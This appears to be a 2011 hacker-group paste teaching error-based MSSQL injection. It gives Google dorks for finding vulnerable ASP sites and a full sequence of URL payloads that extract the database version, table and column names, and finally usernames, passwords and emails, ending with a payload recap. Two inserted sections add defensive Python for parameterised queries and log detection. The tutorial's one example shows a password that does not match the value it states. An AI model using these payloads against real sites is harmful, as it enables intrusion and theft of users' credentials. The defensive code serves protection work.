jingobd

MSSQL INJECTION TUTORIAL

Aug 22nd, 2011
MSSQL Injection - Method Of Attack



BANGLADESHI HACKER.
Bangladesh Cyber Army

    MSSQL - injection, method of attack!
    ###########################
In this tutorial:
    1.1 Introduction
    1.2 How to find a vulnerable page?
    1.3 How to confirm that the site is vulnerable?
    1.4 How to find the version / name of the DB?
    1.5 How to discover the table names (table_name)?
    1.6 How to discover the column names (column_name)?
    1.7 How to get the data from the tables that interest us (e.g. name, pass, email, etc.)?
    1.8 Conclusion


    [1.1 Introduction]
    ############

    This lesson tries to explain a technique you may already have heard of: MSSQL injection.
    You will have the opportunity to learn how this popular method is used to obtain information (username, password, login) or various other data.
    MSSQL injection applies to products created by the well-known company Microsoft.
    This type of injection therefore concerns sites coded in ASP / ASPX, etc.

    There are several types of attack of this kind:

    * - Normal MSSQL SQL injection attacks
    * - MSSQL injection in web services (SOAP injection)
    * - Union-based MSSQL injection attacks
    * - ODBC error attacks using "Convert"
    * - MSSQL blind SQL injection attacks, etc.

    This write-up covers the following type of attack:

    "The ODBC error message attack with Convert"


    [1.2 How to find a vulnerable page? ]
    ############################

    Finding a vulnerable page is easy. You can use the services of the giant company Google.

    Let's open: Google

    Type, for example: inurl: "products". "ID"
    inurl: "neus.asp" menu "
    inurl: "content.asp" under "
    inurl: "games.asp" ID "
    ETC .... (I chose a few examples; you can now use your own logic for better dorks)

    [1.3 How to confirm that the site is vulnerable? ]
    ##################################

    This is very easy to check: append an apostrophe (') to the page's id parameter.
    If the response we get is an error page, it means a vulnerability has been found. Examples:

    ++++++++++++++++++++++++++++++++++++++
    / Microsoft Access ODBC driver /
    ++++++++++++++++++++++++++++++++++++++
    / Unclosed quotation mark /
    ++++++++++++++++++++++++++++++++++++++
    / Microsoft OLE DB Provider for Oracle /
    ++++++++++++++++++++++++++++++++++++++
    / Division by zero /
    ++++++++++++++++++++++++++++++++++++++

    These are some of the most common error responses shown by pages that are vulnerable to MSSQL injection.

    Here is an example of where to put the apostrophe (').


    For example:

    --------------------------------------
    http://www.localhost.com/news.asp?id=100'
    --------------------------------------

    Now we can see that this error is displayed:

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e14'

    Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde '.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    This page is vulnerable!
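As an added example from the defensive side (not part of the original tutorial): the apostrophe test produces an error page because the application pastes the request parameter straight into its SQL text, so the quote becomes part of the query. The Python block below mimics both handlers against an in-memory SQLite database, which stands in for SQL Server here (an assumption; the error wording differs, the mechanism does not). The table, rows and handler names are constructed for the example. The hardened handler validates the type, binds the value as a parameter, and keeps the database error (with its file path and line number, as in the message above) on the server instead of rendering it to the client.

```python
import sqlite3

# Constructed sample data standing in for the site's "news" table.
SAMPLE_ROWS = [(100, "First article"), (101, "Second article")]


def make_db():
    """In-memory SQLite database used as a stand-in for MSSQL (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_news_unsafe(conn, raw_id):
    """Vulnerable pattern: the request parameter is concatenated into the SQL text.

    A trailing apostrophe in raw_id leaves the quoting unbalanced, and the database
    error text (query internals included) is handed back to the caller, which is
    exactly the behaviour the error pages in the tutorial show.
    """
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # A classic ASP page renders this, file path and line number included.
        return ("error", str(exc))


def log_server_side(exc):
    """Placeholder for the application's logger: details stay on the server."""
    print("server log:", exc)


def lookup_news_safe(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value as a parameter so the
    database never parses user input as SQL. Errors are logged, not echoed."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return ("rejected", "id must be an integer")
    try:
        rows = conn.execute(
            "SELECT id, title FROM news WHERE id = ?", (news_id,)
        ).fetchall()
        return ("ok", rows)
    except sqlite3.Error as exc:
        log_server_side(exc)
        return ("error", "An internal error occurred")  # generic client message


if __name__ == "__main__":
    conn = make_db()
    for raw in ("100", "100'"):
        print(repr(raw), "unsafe ->", lookup_news_unsafe(conn, raw))
        print(repr(raw), "safe   ->", lookup_news_safe(conn, raw))
```

Run it and the same input `100'` yields a database syntax error from the unsafe handler and a plain "rejected" from the safe one; the real fix for the pages described in this tutorial is the same two steps, parameterised queries plus generic error pages, regardless of language.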


    [1.4 How to find the version / DB name? ]
    ############################


    An example makes this easier to understand:

    Version:

    --------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))--
    --------------------------------------------------------------------


    And here is what we get in our example:

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) (SM)' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



    Now let's find the DB_Name:

    ---------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name()))--
    ---------------------------------------------------------------------

    e.g.


    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'EVILZONE_CREW_DB' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    [1.5 How to discover the table names (table_name)]
    ######################################


    Discovering, or simply finding, the table names is done with this method.

    For example:

    ----------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
    ----------------------------------------------------------------------------------------------------------------


    And now an error such as this will appear:

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'users' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    So in this case the first table (table_name) is 'Users'; now let's find the next table:

    For example:

    ------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
    ------------------------------------------------------------------------------------------------------------------------------------------------


    And now the same error message will appear, giving another table:

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'news' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    The other table in this case is 'news'.

    Now, to find the third table (table_name), proceed like this:

    For example:


    ---------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
    ---------------------------------------------------------------------------------------------------------------------------------------------------------


    The third table appears to us:


    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'categories' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    So the third table is 'categories', and so on until you have found all the tables.

    For example:


    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users', 'news', 'Categories')))--
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    [1.6 How to discover the column names (column_name)]
    ###########################################

    If you want the column names (column_name) for the table 'Users', proceed like this:

    For example:


    -----------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--
    -----------------------------------------------------------------------------------------------------------------------------------------
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'Name' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    So the first column name for the table (table_name) 'Users' is 'name'.

    Now find the other column (column_name) in the same table 'Users':

    For example:


    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name')))--
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'password' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    The other column name (column_name) is 'password'; now let's find the next column_name:

    For example:

    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name', 'password')))--
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'emailaddress' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    So the third column_name is 'emailaddress', and so on until the end, until you have found all the columns (column_name)!



    [1.7 How to get the data that interests you (username, pass, email, etc.)]
    #####################################################


    For this you do not need anything different from what we mentioned before.
    In this section, all that needs to be done is to use the table name (table_name) and the column names (column_name) found in the earlier results.

    In this section we will use:
    Table_name = Users
    Column_name = user name, password, emailaddress!

    Now we substitute them into the example:


    -------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 name from Users))--
    -------------------------------------------------------------------------------------------
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'administrator' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    user name: Administrator

    Now replace the first column 'name' with the second column 'password':

    For example:


    -----------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
    -----------------------------------------------------------------------------------------------

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value '123456' to data type int.

    /MSN/shared/includes/main_rub.asp, Line 4
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    password: administratorpassword123

    The next column works the same way as above:

    For example:


    ---------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
    ---------------------------------------------------------------------------------------------------

    emailaddress: king.cyborg@yahoo.com

    So we have obtained the information from the page: the name / pass and emailaddress.

    user name: Administrator
    password: administratorpassword123
    emailaddress: king.cyborg@yahoo.com

    [ 1.8 Conclusion ]
    ############

    =============================================================================
    www.localhost.com/news.asp?id=100'
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...(@@version))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...(db_name()))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
    ============================================================================
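As an added example from the detection side (not part of the original tutorial): the request sequence summarised above leaves a recognisable trail in web-server logs. The Python block below runs a small signature set over constructed IIS W3C-style log lines (the addresses, timestamps and the eleven-field layout are made up for the example; the payloads are the ones listed on this page) after URL-decoding the query string, and groups the hits per client so that the probe-then-enumerate pattern stands out. The 500 responses in the sample are the verbose error pages the technique depends on, which is why the aggregate also counts them.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not from any real server). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2011-08-22 10:11:52 10.0.0.5 GET /news.asp id=100 80 - 198.51.100.7 Mozilla/4.0+(compatible) 200
2011-08-22 10:11:58 10.0.0.5 GET /news.asp id=100%27 80 - 198.51.100.7 Mozilla/4.0+(compatible) 500
2011-08-22 10:12:03 10.0.0.5 GET /news.asp id=100+or+1=convert(int,(@@version))-- 80 - 198.51.100.7 Mozilla/4.0+(compatible) 500
2011-08-22 10:12:09 10.0.0.5 GET /news.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 80 - 198.51.100.7 Mozilla/4.0+(compatible) 500
2011-08-22 10:12:15 10.0.0.5 GET /news.asp id=101 80 - 203.0.113.9 Mozilla/5.0+(Windows) 200
2011-08-22 10:12:20 10.0.0.5 GET /content.asp id=7%20or%201=CONVERT(INT,(DB_NAME()))-- 80 - 198.51.100.7 Mozilla/4.0+(compatible) 500
"""

# Markers of the error-based CONVERT technique, matched after URL decoding and
# case folding so that %27, '+' and mixed case do not slip past them.
SIGNATURES = {
    "convert_cast": re.compile(r"\bconvert\s*\(\s*int\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "server_fingerprint": re.compile(r"@@version|\bdb_name\s*\(", re.I),
    "not_in_walk": re.compile(r"\bnot\s+in\s*\(", re.I),
    "quote_probe": re.compile(r"^[^']*\d'\s*$"),  # e.g. id=100' and nothing else
}


def parse_line(line):
    """Split one log line into the fields the detector needs (assumed layout above)."""
    parts = line.split()
    if len(parts) < 11:
        return None
    return {
        "time": parts[0] + " " + parts[1],
        "client": parts[8],
        "stem": parts[4],
        "query": unquote_plus(parts[5]),  # decode %27 and '+' before matching
        "status": int(parts[10]),
    }


def classify(query):
    """Return the names of every signature that matches a decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan(log_text):
    """One finding per suspicious request, noting whether the server answered with
    a 5xx, the usual symptom of a verbose ODBC/OLE DB error page."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            findings.append({
                "time": rec["time"],
                "client": rec["client"],
                "stem": rec["stem"],
                "signatures": hits,
                "error_page": rec["status"] >= 500,
            })
    return findings


def clients_by_severity(findings):
    """Aggregate per source address: a quote probe followed by CONVERT and schema
    requests from one client is the enumeration sequence this page walks through."""
    per_client = {}
    for f in findings:
        entry = per_client.setdefault(
            f["client"], {"requests": 0, "signatures": set(), "error_pages": 0}
        )
        entry["requests"] += 1
        entry["signatures"].update(f["signatures"])
        entry["error_pages"] += int(f["error_page"])
    return per_client


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f)
    print(clients_by_severity(found))
```

The decode-before-match step matters: the raw `cs-uri-query` field keeps `%27` and `+` as written by the client, so a signature applied to the raw text misses the simplest probe. A client whose aggregate shows `quote_probe` plus `convert_cast` plus `schema_enum` and a matching count of error pages is the strongest signal; the error-page count alone also tells you the application is still returning verbose database errors, which is the configuration problem to fix first.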
www.bdcyberarmy.com
www.facebook.com/groups/bdcyberarmy
_____________________